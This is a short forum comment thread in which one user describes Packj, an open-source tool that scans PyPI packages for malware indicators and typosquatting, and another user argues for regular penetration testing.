|
|
|
|
|
|
by ashishbijlani
553 days ago
|
|
|
We scan PyPI packages regularly for malware to provide a private registry of vetted packages. The tech is open-sourced: Packj [1]. It uses static+dynamic code/behavioral analysis to scan for indicators of compromise (e.g., spawning of shell, use of SSH keys, network communication, use of decode+eval, etc). It also checks for several metadata attributes to detect impersonating packages (typo squatting). 1. https://github.com/ossillate-inc/packj |
|
|
Also, you only know if your security measures work if you test them. I'd feel much safer if there was regular pen-testing by security researchers. We're talking about potential threats from nation state actors here.